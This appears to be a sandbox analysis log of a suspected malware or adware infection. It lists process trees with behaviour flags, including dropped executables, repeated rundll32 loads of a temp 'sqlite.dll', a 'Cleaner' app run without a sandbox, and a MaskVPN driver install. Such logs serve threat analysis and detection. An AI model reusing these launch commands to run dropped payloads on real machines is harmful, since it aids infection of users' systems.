C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5128 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3904 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3932 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3932 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3656 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5880 /prefetch:16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3608 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6000 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3824 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6516 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5704 /prefetch:26⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6276 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5552 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1852 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6272 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7008 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3800 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6488 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6992 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3056 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7344 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7440 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7624 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5988 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6840 /prefetch:16⤵
-
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"4⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-GQ7IO.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-GQ7IO.tmp\{app}\vdi_compiler"4⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5132 -s 2725⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3896 -ip 38961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1524 -ip 15241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4612 -ip 46121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 2384 -ip 23841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 6479BD780B29DCA4597EB58CE95F395A C2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 72F44C44C65D6810B954FECE7328CD6C C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding E1D742ED256A302B4A72527592FE6A732⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 821DE82F00037D7ABAC1EFDC99C70E75 C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 5641C05DBA904095E4B2DB952999D429 C2⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default3⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"4⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exeC:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x218,0x21c,0x220,0x1f4,0x224,0x7ffb5c20dec0,0x7ffb5c20ded0,0x7ffb5c20dee05⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1588,5897138930702875863,16863112268778844132,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4076_591161915" --mojo-platform-channel-handle=1836 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1588,5897138930702875863,16863112268778844132,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4076_591161915" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1596 /prefetch:25⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1588,5897138930702875863,16863112268778844132,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4076_591161915" --mojo-platform-channel-handle=1996 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1588,5897138930702875863,16863112268778844132,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4076_591161915" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2580 /prefetch:15⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1588,5897138930702875863,16863112268778844132,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4076_591161915" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2624 /prefetch:15⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1588,5897138930702875863,16863112268778844132,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4076_591161915" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2984 /prefetch:25⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,5897138930702875863,16863112268778844132,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4076_591161915" --mojo-platform-channel-handle=3212 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,5897138930702875863,16863112268778844132,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4076_591161915" --mojo-platform-channel-handle=3120 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,5897138930702875863,16863112268778844132,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4076_591161915" --mojo-platform-channel-handle=3140 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,5897138930702875863,16863112268778844132,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4076_591161915" --mojo-platform-channel-handle=1424 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,5897138930702875863,16863112268778844132,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4076_591161915" --mojo-platform-channel-handle=1028 /prefetch:85⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_3323.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 6248 -ip 62481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4640 -ip 46401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3116 -s 4563⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3116 -ip 31161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 6392 -ip 63921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 6236 -ip 62361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 660 -p 3712 -ip 37121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 6492 -ip 64921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1212 -s 4243⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 1212 -ip 12121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 684 -p 5880 -ip 58801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 5132 -ip 51321⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 548 -p 5212 -ip 52121⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall1⤵
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{39d9694e-8953-7945-9647-2079873e003f}\oemvista.inf" "9" "4d14a44ff" "0000000000000160" "WinSta0\Default" "000000000000015C" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000160" "e8b2"2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc1⤵
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
- Executes dropped EXE
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 6800 -ip 68001⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 6456 -ip 64561⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
